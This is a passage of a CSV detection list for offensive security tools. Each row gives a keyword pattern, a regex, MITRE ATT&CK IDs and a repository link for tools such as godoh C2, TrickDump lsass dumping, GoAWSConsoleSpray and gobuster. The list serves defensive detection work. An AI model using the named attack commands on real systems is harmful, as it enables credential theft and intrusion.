Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","46492" "*go install mvdan.cc/garble@latest*",".{0,1000}go\sinstall\smvdan\.cc\/garble\@latest.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","garble binary obfuscation","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","46493" "*go run ./cmd/reverst/*",".{0,1000}go\srun\s\.\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","46494" "*go run cmd/chaos/main.go*",".{0,1000}go\srun\scmd\/chaos\/main\.go.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","46495" "*go run lock.go -o disk*",".{0,1000}go\srun\slock\.go\s\-o\sdisk.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","46496" "*go run poc.go check -t http://*:8080 -u 
Admin*",".{0,1000}go\srun\spoc\.go\scheck\s\-t\shttp\:\/\/.{0,1000}\:8080\s\-u\sAdmin.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z","46497" "*go run scannerPort.go*",".{0,1000}go\srun\sscannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","0","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","46498" "*go run shock.go -o knwondlls*",".{0,1000}go\srun\sshock\.go\s\-o\sknwondlls.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","46499" "*go thru each line in passwords.lst*",".{0,1000}go\sthru\seach\sline\sin\spasswords\.lst.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","46500" "*Go, go ADeleginator!*",".{0,1000}Go,\sgo\sADeleginator!.{0,1000}","offensive_tool_keyword","Adeleginator","tool 
that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","46501" "*go.flipt.io/reverst/*",".{0,1000}go\.flipt\.io\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","46502" "*go.flipt.io/reverst/*",".{0,1000}go\.flipt\.io\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","46503" "*go_shellcode_encode.py*",".{0,1000}go_shellcode_encode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","46504" "*GoAWSConsoleSpray -*",".{0,1000}GoAWSConsoleSpray\s\-.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46505" "*GoAWSConsoleSpray.exe*",".{0,1000}GoAWSConsoleSpray\.exe.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46506" "*GoAWSConsoleSpray@latest*",".{0,1000}GoAWSConsoleSpray\@latest.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential 
Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46507" "*GoAWSConsoleSpray-master.zip*",".{0,1000}GoAWSConsoleSpray\-master\.zip.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46508" "*gobfuscate*",".{0,1000}gobfuscate.{0,1000}","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","N/A","10","1507","162","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z","46509" "*gobuster dir *",".{0,1000}gobuster\sdir\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46510" "*gobuster dir -w *",".{0,1000}gobuster\sdir\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46511" "*gobuster dns*",".{0,1000}gobuster\sdns.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46512" "*gobuster fuzz -*",".{0,1000}gobuster\sfuzz\s\-.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46513" "*gobuster gcs *",".{0,1000}gobuster\sgcs\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46514" "*gobuster s3 *",".{0,1000}gobuster\ss3\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46515" "*gobuster tftp *",".{0,1000}gobuster\stftp\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - 
TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46516" "*gobuster vhost -u *",".{0,1000}gobuster\svhost\s\-u\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46517" "*gobuster vhost*",".{0,1000}gobuster\svhost.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46518" "*gobuster*",".{0,1000}gobuster.{0,1000}","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Exploitation tool","https://github.com/OJ/gobuster","1","1","#linux","N/A","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46519" "*gobuster_*.tar.gz*",".{0,1000}gobuster_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46520" "*gobuster_*.zip*",".{0,1000}gobuster_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - 
T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46521" "*gobusterfuzz*",".{0,1000}gobusterfuzz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46522" "*gobustertftp*",".{0,1000}gobustertftp.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46523" "*gocrack@password.crackers.local*",".{0,1000}gocrack\@password\.crackers\.local.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","46524" "*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_darwin_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","46525" 
"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_linux_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","46526" "*GodFault.exe*",".{0,1000}GodFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46527" "*GodFault\GodFault*",".{0,1000}GodFault\\GodFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46528" "*godoh -*",".{0,1000}godoh\s\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46529" "*godoh agent*",".{0,1000}godoh\sagent.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46530" "*godoh c2*",".{0,1000}godoh\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46531" "*godoh --domain*",".{0,1000}godoh\s\-\-domain.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46532" "*godoh help*",".{0,1000}godoh\shelp.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46533" "*godoh receive*",".{0,1000}godoh\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46534" "*godoh send*",".{0,1000}godoh\ssend.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46535" "*godoh test --*",".{0,1000}godoh\stest\s\-\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46536" "*godoh test*",".{0,1000}godoh\stest.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46537" "*godoh* --agent-name *--poll-time*",".{0,1000}godoh.{0,1000}\s\-\-agent\-name\s.{0,1000}\-\-poll\-time.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46538" "*godoh* --domain * c2*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46539" "*godoh* --domain * receive*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46540" "*godoh* --domain *send --file *",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}send\s\-\-file\s.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46541" "*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46542" "*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46543" "*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46544" "*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46545" "*godoh-windows32.*",".{0,1000}godoh\-windows32\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46546" "*godoh-windows32.exe*",".{0,1000}godoh\-windows32\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46547" "*godoh-windows64.*",".{0,1000}godoh\-windows64\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46548" "*godoh-windows64.exe*",".{0,1000}godoh\-windows64\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46549" "*go-donut/*.exe*",".{0,1000}go\-donut\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","46550" "*go-donut/*.go*",".{0,1000}go\-donut\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation 